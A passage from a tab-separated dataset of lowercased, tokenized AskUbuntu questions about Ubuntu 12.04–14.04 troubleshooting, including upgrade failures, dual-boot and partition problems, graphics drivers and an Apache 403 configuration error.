softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa0401cc > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04034c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04038c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa0403cc > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa0402cc > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa0402ec > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04028c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04032c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa0403ec > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04044c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040f4c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040f6c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040fec > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040dac > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040d8c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040e2c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040dcc > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040e6c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040e4c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040ecc > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040eac > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040f2c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04054c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04052c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04058c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04056c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04048c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04046c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa0404ec > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa0404cc > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04060c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa0405ec > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04002c > ] ' 2014-04-19 17:50:05,417 - softwarecenter.ui.gtk3.app - debug - on_review_stats_loaded : '5209' 2014-04-19 17:50:12,723 - softwarecenter.db.update - warning - error processing : time data '' does not match format ' % y- % m- % d % h : % m : % s ' 2014-04-19 17:50:13,468 - softwarecenter.db.update - warning - error processing : time data '' does not match format ' % y- % m- % d % h : % m : % s ' 2014-04-19 17:50:13,676 - softwarecenter.db.update - warning - error processing : time data '' does not match format ' % y- % m- % d % h : % m : % s ' 2014-04-19 17:50:14,206 - softwarecenter.db.update - warning - error processing : time data '' does not match format ' % y- % m- % d % h : % m : % s ' whereupon the process `` hangs '' i have done : sudo apt-get remove software-center followed by a reinstall with no joy . the files keep showing up in /usr/bin and usr/share but the command does n't work and nothing gets added to the launcher , even after i tried : software-center -enable-lp this is all done on a hp compaq desktop with amd 32bit cpu .
451053	how can i install apache , mysql , php on ubuntu desktop	i just installed ubuntu 13.10 desktop , i would like to know can i install apache , mysql and php on ubuntu desktop version or do i need to install on the ubuntu server version ?
451055	upgrade to 14.04 serious errors were found while checking the disk drive for /	i recently upgraded to ubuntu 14.04 lts from 13.10 . i had installed the earlier version using wubi . i am receiving the following error on booting ubuntu with the latest kernel 3.14 serious error while checking for the disk drive for / the follow up says either to ignore , skip mounting or the manual recovery . i can boot into ubuntu 14.04 using the previous kernel version 3.11 in the advanced options specified in the boot options of ubuntu . i have run the fsck on the root.disk and it says the disk is clean .
451056	caps lock does n't work with danish letters	on the virtual console in 14.04 ( e.g . when i log out or switch tty ) i have this problem : the caps lock key does n't take effect on the danish characters æøå . with caps lock on the output for these keys is lower case , not æøå as you would expect . changing the settings for danish keyboard with dpkg-reconfigure keyboard-configuration does n't take effect . neither does installing console-data and loading the keymaps dk or dk-latin1 ( the two danish keymaps available with console-data ) . this was n't a problem with earlier versions of ubuntu .
451058	one of dual monitors not showing correct resolution by default	hoping someone can help me with my situation . i have two asus pb287q monitors connected to my gtx 680 desktop . one is connected via a dual-link dvi port and getting the 2560x1440 resolution by default . the other is using a hdmi 1.4 supported cable but only gets 1920x1080 resolution . i know that it can support 2560x1440 as my windows 7 install picks up the resolution at 60hz no problem over the hdmi . how i can fix this ? current install setup : dual boot ubuntu 14.04/windows 7 latest nvidia drivers
451059	ubuntu 14.04 netflix-desktop slow playback	so i installed ubuntu 14.04 and then installed netflix-desktop . when i playback an video the audio plays back just fine , but the video is lagging behind a lot . had this working on linux mint 16 just fine . my best bet is that it has something to do with pulseaudio , again ... system setup : nvidia geforce 580gtx with driver 331.38 installed dual screen monitors asus p8z77-deluxe motherboard ask if you need any logs about anything . thanks !
451061	help recovering network access in ubuntu 12.04	i recently installed ubuntu 12.04 on my hp chromebook 14 . this morning , when i switched from chrome os to ubuntu , i could not connect to the server . when i tried opening network tools , i got a prompt that said , `` the system network services are not compatible with this version.¨ i 've read a few past threads where people have experienced something ¨similar , ¨ and had to downgrade to version 3 . i would like a second , third opinion before proceeding . does anyone think that this is the correct approach ? and if so , i 'm not quite sure how to appropriately install the downgrade while still having the previous network manager installed . ** suggestions are appreciated ! thanks .
451062	sudo commands are run without entering the root password , how to stop this ?	i have n't edited my sudoers , but i do n't have to enter the password when running a sudo command line in the terminal . i can run any sudo command without entering the password , how can i stop this ?
451064	12.04 freezing issue	my problem is as follows ... my computer boots up , i log in , shortly after the computer freezes ( at which point i ca n't move the mouse around , though any audio from an app is being played ) , i use ctl + alt + f2 , then ctl+alt+f7 to get back into the desktop , and everything is fine until a few minutes later when the thing freezes up again and i have to repeat the ctl+alt commands . any fix ?
451067	should i use nvidia graphic card to watch movie ?	i 'm always watching movie with vlc media player , but i 'm afraid that it will hurt the laptop motherboard intel graphic . should i use build in graphic card to open vlc media player to reduce the laptop burden ? for example , optirun vlc on terminal instead .
451069	linux application to install windows on a usb drive	there are everal applications which can install ms windows on a usb drive , but all of these applications should be installed in a windows environment . i am an ubuntu user and do not have a windows environment to install these applications , which can make a bootable windows usb . is there a linux ( ubuntu ) application for install windows xp from iso file on a usb drive ? to build a bootable windows usb .
451070	ca n't shutdown and logout from top panel in ubuntu 14.04 lts	i recently installed ubuntu 14.04 . shutdown and logout from the top panel are not working . they worked fine when installing the os , but a few days back i installed fglrx drivers for my ati graphics card . they did n't work and i got low resolution problems and ubuntu did n't boot . i solved it by removing the fglrx graphic driver from the recovery mode and ubuntu started to boot and work just fine , at least that 's what i thought . but now the shutdown and logout options in the top panel do n't work . i have to logout using ctrl+alt+delete and shutdown with the shutdown option in the top panel ( shutdown option works after logging out but not when logged in as a user ) . i re-installed ubuntu 14.04 lts and shutdown options worked fine but after installing updates they stopped working again . i thought its the graphic driver fglrx installation problem but now i know its not that . i think its a problem with some file that got installed from ubuntu updates . does any one know how to solve it thanks in advance ,
451072	14.04 not detecting windows 8	first time i get ubuntu to load up without having to change secure boot , uefi , but it does n't detect my preinstalled windows 8 on the hard drive . the option to install alongside windows is n't available but cleaning the whole disk is always highlighted .
451079	shutdown using keyboard	after i installed ubuntu 13.10 , for some reason my video card does not have output , i just wonder if this is the case , are there any way to shut down ubuntu using keyboard safely without harm the system ? your information and help is great appreciated .
451080	ubuntu 14.04 mouse and window focus issues	so i just installed ubuntu 14.04 tonight and i 'm having this weird issue with my mouse and window focus . i ca n't seem to click on any unity launcher icons . more over i ca n't click on unfocused windows to bring them to the front . it does n't work . i do n't know how better to explain this . it is seemingly random when i can click on something inside a window . i ca n't even click on the `` x '' button to close or the title bar to move the window around most of the time . what 's causing this behaviour ? i really want to start using ubuntu as my main desktop but i 've always had weird issues like this when i would test out a release . in a vm i do n't have problems but after a real install i get problems . edit : some more information , my mouse is a usb rat5 gaming mouse . not that i think it 's the physical mouse that 's broke ... and the pointer does n't freeze or anything . i just ca n't click on anything the majority of the time .
451083	acer r7 -- broadcom wireless driver does not load	this belongs in the category weird and freaky . i have one of the fancy `` ezel hinge '' acer r7 touch screen laptops . ( i5 , 12 gb ram ) installing linux to dual boot with windows 8 is a pain ... and so i have my linuxlive ubuntu usb stick . hooray . to install , i load the desktop first . then i run sudo software-properties-gtk i go to the third party driver tab ... and i turn on the broadcom 802.11n wireless adapter . ( broadcom sta something something . ) it detects it and installs it just fine . it works like a charm ! then i install with my new found internet access . then after a uefi boot-repair , i finally dual boot . hurray . i go to turn on my wireless adapter ... rinse repeat . sudo software-properties-gtk it detects , etc . etc . then , i hit apply changes just as before . the progress bar gets about 2/3 and then ubuntu reverts to the previous `` none '' . this happened on 13.04 and since 14.04 came out a day ago , i redid it all . exact same problem . i expect there is something going on here that ubuntu ca n't find the driver to load it ... and i lack the skill to troubleshoot that particular problem . maybe the installed source files are n't set up right in software center ? idk . ps > i am not sure the exact chipset , trying to get that figured out . thanks ! jeremy i found someone with same problem , slightly different computer enter link description here
451087	*error* eir stuck : 0x00000010 during boot	i have just installed ubuntu 14.04 on my dell vostro 1015 laptop , and now i am getting an error during boot-up that says something like : ******error* eir stuck : 0x00000010 , *** i searched a bit , and found that it is a problem with the graphics processor or something like that . in the code block below are the results of running four commands : $ sudo dpkg -l | grep video-intel** ii xserver-xorg-video-intel 2:2.99.910-0ubuntu1 i386 x.org x server -- intel i8xx , i9xx display driver $ lsb_release -a** no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty $ uname -a** linux mrinal-vostro-1015 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:08:14 utc 2014 i686 i686 i686 gnu/linux $ sudo lspci | grep vga** 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) any workaround ? thanks in advance .
451092	ltsp client image load hangs on ubuntu 14.04 lts	i 'm bringing up ltsp on ubuntu 14.04 lts for the first time . the client reaches the point that its console says : tftp prefix : /ltsp/i386 trying to load : pxelinux.cfg/default loading vmliuz-3.13.0-24-generic ... . loading initrd.img-3.13.0-24-generic ... ... ... ... ... ready . and stops . depending on the client , it may also say : socket failed : connection timed out or socket failed : connection failed then bring up busybox or go into a kernel panic . how can i debug this ?
451093	ubuntu v14.04 looks too slow	i installed ubuntu 14.04 x64 on my pc . e5500 dual core 2.8ghz processor , 4gb ram , gt610 1gb graphic card , 80 gb hard disk ( for ubuntu ) , 500gb hard disk ( windows 8 ) everything is slow . i mean when am moving a window it is moving slow , when minimizing , restoring , the item bar , everything is slow . why is that ? please someone help me to fix this .
451095	lubuntu 14.04 and fcitx-qimpanel : how to remove this black square	now that fcitx-qimpanel is properly installed on my lubuntu 14.04 ( see this problem on askubuntu sogou linux 搜狗拼音 for lubuntu 14.04 ) i still have a small problem : how to remove this black square that appears near my cursor ( where the input method rectangle appears when i 'm typing ) ? if you have any idea , thank you for your suggestions .
451096	brightness notification on xubuntu shrunk after update	my brightness notification has shrunk . it was fine before i installed the updates after installing xubuntu 14.04 . i first noticed after booting for the first time after the upgrade . here is a screenshot : the brightness notification is that small box under the volume notification . as you can see it 's only the brighness notification that 's affected . how can i revert this ?
451097	how do you restore bootable flag to windows hdd ?	on my dell inspiron 660 i have windows 8.1 . now , feeling as if that is not open-source enough , i often boot into ubuntu 12.04 via live usb . doing so has , somehow , turned off bootable flag for windows partition when in legacy mode . upon booting i get a no bootable device -- insert boot disk and press any key error . windows works fine and i can boot it in uefi mode . very confused , but still an advanced user . please help . my pastebin of bootinfo script : http : //paste.ubuntu.com/7288803/
451098	100 % cpu usage ubuntu 14.04 compiz	my motherboard a8v-mx via k8m800 with on board graphics card . after fresh install everything was very sluggish . i checked system monitor to see my cpu usage at a constant 100 % . compiz is the process using so much of cpu . how to fix this ? if this is a bug how to report it ? thanks .
451099	how to use scroll lock key to browse through gnome-terminal 's output ?	while using gnome-terminal , the only way to view output is to use the scroll bar on one of the sides of the emulator . by default the arrow keys ( ↑↓ ) are set to browse through history commands one by one . i want to use scrlk⇓ with the arrow keys to browse through output rather than history ( i.e when scrlk⇓ is inactive , arrow keys would browse through history and when scrlk⇓ is active , arrow keys would browse through output ) . how do i do this ? note : by default , scrlk⇓ key is not detected by x and only detected by tty . so i made it detectable by using the following commands . first checked the empty mod with , xmodmap -pm then assigned scrlk⇓ to empty mod 3 , xmodmap -e 'add mod3 = scroll_lock'
451100	pretty sure i broke something when i deleted the old partition and resized the current linux partition	i was trying to get rid of the old windows partition on my computer and just have the ubuntu 12.04 one . i used gparted to delete the old partition and resize the current linux . the problem is when i go into devices i see my `` os '' hard drive , i right-click to mount it , and it does nothing as if i never clicked it . please help .
451102	how can i repair ubuntu 14.04 lts broken installation ?	i have ubuntu 14.04 lts installed on my laptop ( upgraded from 13.10 ) . when i tried to upgrade my ubuntu 13.10 , in the middle of upgrade proccess , my system crashed and i had to restart my laptop . after restarting , everything seems good and installed and ubuntu 14.04 comes up ! this is so strange because the installation proccess was almost in 50 % and i want to find a way to repair my ubuntu 14.04 . i tried to repair my os using ubuntu 14.04 lts bootable dvd but reinstall option was disabled ! is there any command to check kernel files ( and other modules and libraries files ) integrity with ubuntu dvd ? ( like sfc /scannow in windows ) i want to find and repair probable damaged files . note that , format and reinstall is not an option for me .
451103	execute action upon window resize with devilspie2	i 'm looking for a devilspie2 alternative that can handle more window events , like `` on resize '' . right now there 's only open and close window events . for example , i would like to undecorate a window only if it 's maximized . if ( get_application_name ( ) == `` myapp '' ) then if ( get_window_is_maximized ( ) == true ) then undecorate_window ( ) else decorate_window ( ) end end
451104	is there a way to change ibus icon in notification area ? ( xubuntu )	i need to constantly switch between different keyboard layouts , i did this with the `` keyboard layout '' element in xfce panels , it was ugly but i could put it anywhere ( so i put it in a seperate `` auto hide '' panel ) . the problem is that after i upgraded to xubuntu 14.04 that keyboard layout element does not work anymore , instead , i get an ibus icon in the notifications area . i do n't like the icon 's looks , but it seems like i ca n't move it like i could with the other thing , so i have to either hide it and do a bunch of clicks every time i wan na change the keyboard layout , or have an unfitting icon ( compared with all the other ones ) . so the question is : how can i change that icon ?
451105	trouble upgrading from 13.10 to 14.04	completed an upgrade from 13.10 to 14.04 on a dell latitude . traditionally i use the default ubuntu desktop , but following the upgrade , the desktop fails to load . i can access the command line via ctrl+alt+f1 , but nothing further . i can load kde and use that , but i do n't want to . finally , the wireless does not seem to be functional either . open to suggestions .
451107	how do i upgrade kindle version on ubuntu 12.04 ?	i have installed kindle using wine but it shows : kindle version is out of date and wo n't work , please upgrade !
451115	how to know partitions size	i entered sudo fdisk -l now i want to know how much of my hard disk belong to this partition : device boot start end blocks id system /dev/sda2 156264318 273474494 58605088+ 7 hpfs/ntfs/exfat
451117	porting ubuntu touch on motorola xt624 ( iron rock )	does anybody could help me on this challenge ? i want to port ubuntu touch on my motorola xt624 ( iden + 3g + wifi ) android phone . these smartphone is similar to others mororola razr , but the main difference is the iden ( nextel radio conection ) . i did n't found documentation or tutorial about how to port or find the iden drivers . i tried found on ubuntu touch rc channel but withou lucky . anyone can help me or work together to port this phone ? wilson ponso
451118	unable to access âdsk1_vol5 ''	i want to go dsk_vol5 : but i see this eror error mounting /dev/sda4 at /media/ubuntu/dsk1_vol5 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sda4 '' `` /media/ubuntu/dsk1_vol5 '' ' exited with non-zero exit status 13 : ntfs_mst_post_read_fixup_warn : magic : 0x00000000 size : 4096 usa_ofs : 0 usa_count : 65535 : invalid argument actual vcn ( 0x0 ) of index buffer is different from expected vcn ( 0x4 ) . failed to mount '/dev/sda4 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details .
451120	ubuntu on windows 8	i have installed ubuntu 14.04 lts on my sony vaio laptop from bootable pendrive . during installation there was only 1mb free space on hard drives . so i installed it on hard drive with no free space . but on installation my windows 8 is not working properly . i can only access it ca n't play music or other application . third hard drive is not accessible from windows , its name has been changed . on clicking it it suggest to format . i am not getting system restore point on windows 8 to revert setting . please help how to resolve issue so that i can run both windows 8 and ubuntu on same system . one of the possible reason that i can not access one hard drive is because ubuntu is installed on it and to access it ext4 file system is needed . but if i install ext4 software can i access my files again ? why is my programs ( vlc ) etc are not working ? here 's what my ubuntu installation shows in installation type device type mount point format ? size used system /dev/sda fat32 277mb 33mb /dev/sda2 ntfs 1545mb unkonwn /dev/sda3 efil 272mb 272mb /dev/sda4 134mb unknown /dev/sda5 swap 178640mb 0mb /dev/sda6 ext4 161060mb unknown /dev/sda7 ntfs 161060mb 5884mb ubuntu 14.04 lts ( 14.04 ) free space 1mb /dev/sda8 ntfs 214747mb unknown free space 1 mb /dev/sda9 ext4 32417mb 733mb free space 0mb in windows on start shows explorer.exe - bad image there is c drive , drive e drive f and drive g. i am unable to access drive f nor can i play any music or other files in windows . thanks .
451125	how to access windows files in ubuntu	i am running ubuntu 14.04 on legacy and windows 8.1 on uefi . i have my media ( movie songs and video songs ) in `` my music '' and `` my videos '' folders in windows . i am able to access different hard drives except c drive ( windows ) . now can someone please tell me how to access those `` my music '' and `` my videos '' folders in ubuntu ? because i cant find them in ubuntu . output of lsblk : name maj : min rm size ro type mountpoint sda 8:0 0 465.8g 0 disk ├─sda1 8:1 0 260m 0 part ├─sda2 8:2 0 1.5g 0 part ├─sda3 8:3 0 260m 0 part ├─sda4 8:4 0 128m 0 part ├─sda5 8:5 0 245.7g 0 part ├─sda6 8:6 0 350m 0 part ├─sda7 8:7 0 97.7g 0 part ├─sda8 8:8 0 72.3g 0 part ├─sda9 8:9 0 25.4g 0 part / ├─sda10 8:10 0 22.3g 0 part ├─sda11 8:11 0 2m 0 part [ swap ] └─sda12 8:12 0 1m 0 part sr0 11:0 1 1024m 0 rom
451128	how to know partitions ' names	how do i get to know partitions ' names ? i entered sudo fdisk -l , and i got : device boot start end blocks id system /dev/sda1 156264318 273474494 58605088+ 7 hpfs/ntfs/exfat /dev/sda2 273474558 353670974 40098208+ 7 hpfs/ntfs/exfat /dev/sda3 390684798 507894974 58605088+ 7 hpfs/ntfs/exfat /dev/sda4 507895038 625105214 58605088+ 7 hpfs/ntfs/exfat for example , which one is dsk_vol5 or dsk_vol2 ?
451133	uefi install ubuntu 14.04 along windows 8 ( dual boot )	i have a preinstalled windows 8.1 with secure boot on . i installed ubuntu 14.04 in uefi after which it showed the boot menu for first time , then i booted into windows and then when i started the pc next day ( following shutdown ) it booted directly into windows . i need to install ubuntu 14.04 on it properly.please help me through this by possibly giving a detailed order of steps to follow . thank you
451134	ubuntu 14.04 displays only background with no launcher after log in	upgraded to ubuntu 14.04 64bit and now after logging in all i get is my background screen . almost seems like a driver issue with my graphics card . i ca n't even launch a terminal . i can however hold ctrl/alt f1 and access terminal that way . any help is much appreciated . thanks .
451135	qml : how do you toggle boolean ?	in qml , how do you toggle boolean non explicitly ? for example : whenever a button is pressed , a boolean property will simply switch to its other value . if false , it will be come true . if true , it will become false .
451138	can i reinstall windows again from dvd 's to run only windows ?	if i erase windows from sony vaio laptop and install ubuntu . can i reinstall windows again from dvd 's to run only windows ?
451142	upgrade to 14.04 memory allocation problem	recently did a fresh install on my laptop to 13.10 to prepare for the lts release . i started the upgrade process when the updater prompted and read a book waiting for it . when i checked on the upgrade , it got stuck for a while unpacking some fonts . when i checked later again , this happened : dpkg : unrecognizable fatal error , aborting : followed by : fork failed : can not allocate memory i have a system monitor on the top menu bar and saw that ram and swap 's been filled up completely ( both are about 4gb ) . image here : http : //imgur.com/ihakavo the upgrade continued after a while when i was looking for solutions with some errors saying that it could n't install a package because it was already installed and configured . after using the updater to install the packages that were n't able to , i rebooted . but , after logging in , a report error window pops up and selecting any choice leads to a black screen and an unresponsive computer . that happens every time i reboot . why did the upgrade tool not limit itself memory-wise ? is there a way to fix this before resorting to a clean install ? edit : i still do n't know what caused it to do that , but i was able to install 14.04 after a few more upgrade attempts .
451145	plz recommend me how to make a partitions ( reasking : / )	currently , i 'm trying to install ubuntu 14.04 to my laptop . i have two hard drive , ssd with sdb ( windows 8.1 in it ) and hdd with sda ( data partition ) . of course , i 'll mount /home in hdd , but problem is ssd partition . if i mount 10gb ( ssd ) for / partition , i guess i can not use heavy programs like matlab , ccs , compiler tools , etc . but giving too much size for / is difficult because my ssd size is limited . would you recommend me how can i set partition for ubuntu ? also , where should i install bootloader ? sda or sdb ( ssd ) ? thanks in advance . gparted screenshot :
451147	unity notifications messed up after installing gnome	i made a fresh installation of ubuntu 14.04 and then decided to try gnome and installed its packages . i did n't like it and came back to using to unity . after this experiment the notifications became messed up . for the text messages they appeared in the plain text mode without any borders , in a plain rectangle in the different part of the screen . also the notifications of the change of volume and brightness are also gone . where can i restore them ? i checked the content of : /usr/share/dbus-1/services/org.freedesktop.notifications.service [ d-bus service ] name=org.freedesktop.notifications exec=/usr/lib/x86_64-linux-gnu/notify-osd
451154	change ubuntu kernel with other unix variants	is it possible to install `` minix 3 '' kernel on ubuntu .
451156	themes and icons change to default automatically in ubuntu 14.04lts	i have customized my ubuntu themes and icons but after rebooting the computer i find my themes and icons change to default . i tried to solve it by starting recovery mode to fix the damaged package.i got my themes and my icons back but after rebooting the problem appears again . i think there is problem with gnome and unity . that 's how my desktop appears and that 's how my normal desktop appears i 'm using ubuntu 14.04 lts 32-bit
451159	how to fix : no unity , no launcher no dash in ubuntu 14.04	i have two computers . one intel i3 core with nvidia graphics card and the other amd 4000+ with nvidia graphics . in both these computers i upgraded from 13.10 to 14.04 . now both these computers are stuck up with the chosen wallpaper showing ubuntu 14.04 lts and nothing else . right click , ctrl+alt+t does not work . but ctrl + alt + f1 works and i am presented with terminal prompt . i have already updated nvidia drivers . tried reinstalling unity and desktop but no effect . i even tried sudo dconf reset -f /org/comiz/ but the outcome was unable to launch d-bus without x11 $ display .
451160	themes and wallpapers are different in login screen and user screen !	as the title says . things i did before this started to happen , updated to 14.04 had cairo-dock but removed it after updating , at log in screen i have `` adwaita '' theme and that aweful purple wallpaper without the dots ( i disabled those dots before updating to 14.04 ) . but in user space i have the theme i want and the wallpaper ( one of the default wallpapers ) . i just want how things were before ( i.e . default wall and theme , same in both log-in screen and user scr ) . why i am troubled is that , after i give password and press enter the screen freezes for 3-4 secs and top portion flickers showing so-many `` enter user id and password spaces '' , then when m successfully loged in everything runs fine ( but sometimes when i click shut down/restart/logoff buttons nothing happens . so i have to use power button of my lappy to shut it down .
451161	dell m5030 compatability with ubuntu 14.04	i 'm looking to do a fresh install of ubuntu 14.04 on my dell m5030 laptop running ubuntu 10.04 . will 14.04 be compatible with all the hardware ( wifi drivers/usb drivers/mouse drivers/etc ) ? i 'd have no way to revert back to 10.04 if i made the switch and then i 'd have a useless laptop . thanks much , wes
451162	lamp 403 forbidden	i have installed lamp and webmin to ubuntu . using webmin i have created virtual host : ip - 192.168.0.104 , document root - /home/inferusvv/www ( by the way it does n't matter , i create it using webmin or my hands ) . and if i open 192.168.0.104 , it return 403 forbidden error . i tried to set chmod 777 to home and parent directories , but no results . local host opened successfully . it 's doc root is default - /var/www config : < virtualhost 192.168.0.104 > documentroot /home/inferusvv/www < directory `` /home/inferusvv/www '' > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > < /virtualhost > error.log : [ sun apr 20 00:47:29.326223 2014 ] [ mpm_prefork : notice ] [ pid 7785 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4 configured -- resuming normal operations [ sun apr 20 00:47:29.326256 2014 ] [ core : notice ] [ pid 7785 ] ah00094 : command line : '/usr/sbin/apache2' [ sun apr 20 00:54:57.131853 2014 ] [ mpm_prefork : notice ] [ pid 7785 ] ah00169 : caught sigterm , shutting down [ sun apr 20 00:54:58.327003 2014 ] [ mpm_prefork : notice ] [ pid 8554 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4 configured -- resuming normal operations [ sun apr 20 00:54:58.327056 2014 ] [ core : notice ] [ pid 8554 ] ah00094 : command line : '/usr/sbin/apache2 ' [ sun apr 20 00:55:03.982072 2014 ] [ authz_core : error ] [ pid 8558 ] [ client 192.168.0.104:45079 ] ah01630 : client denied by server configuration : /home/inferusvv/www/index.html [ sun apr 20 00:55:04.690839 2014 ] [ authz_core : error ] [ pid 8558 ] [ client 192.168.0.104:45079 ] ah01630 : client denied by server configuration : /home/inferusvv/www/index.html [ sun apr 20 00:55:04.923196 2014 ] [ authz_core : error ] [ pid 8558 ] [ client 192.168.0.104:45079 ] ah01630 : client denied by server configuration : /home/inferusvv/www/index.html [ sun apr 20 00:55:05.143330 2014 ] [ authz_core : error ] [ pid 8558 ] [ client 192.168.0.104:45079 ] ah01630 : client denied by server configuration : /home/inferusvv/www/index.html [ sun apr 20 00:55:05.357654 2014 ] [ authz_core : error ] [ pid 8558 ] [ client 192.168.0.104:45079 ] ah01630 : client denied by server configuration : /home/inferusvv/www/index.html [ sun apr 20 00:56:07.465333 2014 ] [ mpm_prefork : notice ] [ pid 8554 ] ah00169 : caught sigterm , shutting down [ sun apr 20 00:56:09.052056 2014 ] [ mpm_prefork : notice ] [ pid 8673 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4 configured -- resuming normal operations [ sun apr 20 00:56:09.052095 2014 ] [ core : notice ] [ pid 8673 ] ah00094 : command line : '/usr/sbin/apache2 ' [ sun apr 20 00:56:12.696270 2014 ] [ authz_core : error ] [ pid 8677 ] [ client 192.168.0.104:45084 ] ah01630 : client denied by server configuration : /home/inferusvv/www/index.html [ sun apr 20 00:56:13.341787 2014 ] [ authz_core : error ] [ pid 8677 ] [ client 192.168.0.104:45084 ] ah01630 : client denied by server configuration : /home/inferusvv/www/index.html [ sun apr 20 00:56:13.569761 2014 ] [ authz_core : error ] [ pid 8677 ] [ client 192.168.0.104:45084 ] ah01630 : client denied by server configuration : /home/inferusvv/www/index.html [ sun apr 20 01:07:38.444145 2014 ] [ authz_core : error ] [ pid 8680 ] [ client 192.168.0.104:45377 ] ah01630 : client denied by server configuration : /home/inferusvv/www/index.html [ sun apr 20 01:07:40.594600 2014 ] [ authz_core : error ] [ pid 8680 ] [ client 192.168.0.104:45377 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 01:07:53.910335 2014 ] [ mpm_prefork : notice ] [ pid 8673 ] ah00169 : caught sigterm , shutting down [ sun apr 20 10:11:37.504333 2014 ] [ mpm_prefork : notice ] [ pid 1200 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4 configured -- resuming normal operations [ sun apr 20 10:11:37.529485 2014 ] [ core : notice ] [ pid 1200 ] ah00094 : command line : '/usr/sbin/apache2' [ sun apr 20 10:19:25.905575 2014 ] [ authz_core : error ] [ pid 1258 ] [ client 192.168.0.104:51256 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:19:26.280338 2014 ] [ authz_core : error ] [ pid 1258 ] [ client 192.168.0.104:51256 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:19:29.229410 2014 ] [ authz_core : error ] [ pid 1259 ] [ client 192.168.0.105:65294 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:20:55.582114 2014 ] [ authz_core : error ] [ pid 1257 ] [ client 192.168.0.104:51261 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:20:55.847450 2014 ] [ authz_core : error ] [ pid 1257 ] [ client 192.168.0.104:51261 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:21:12.789489 2014 ] [ mpm_prefork : notice ] [ pid 1200 ] ah00169 : caught sigterm , shutting down [ sun apr 20 10:21:13.870504 2014 ] [ mpm_prefork : notice ] [ pid 3765 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4 configured -- resuming normal operations [ sun apr 20 10:21:13.870555 2014 ] [ core : notice ] [ pid 3765 ] ah00094 : command line : '/usr/sbin/apache2' [ sun apr 20 10:21:19.459459 2014 ] [ authz_core : error ] [ pid 3769 ] [ client 192.168.0.104:51267 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:21:19.736510 2014 ] [ authz_core : error ] [ pid 3769 ] [ client 192.168.0.104:51267 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:21:20.248496 2014 ] [ authz_core : error ] [ pid 3769 ] [ client 192.168.0.104:51267 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:21:20.443041 2014 ] [ authz_core : error ] [ pid 3769 ] [ client 192.168.0.104:51267 ] ah01630 : client denied by server configuration : /home/inferusvv/www/favicon.ico [ sun apr 20 10:21:20.479309 2014 ] [ authz_core : error ] [ pid 3769 ] [ client 192.168.0.104:51267 ] ah01630 : client denied by server configuration : /home/inferusvv/www/ [ sun apr 20 10:21:20.684473 2014 ] [ authz_core : error ] [ 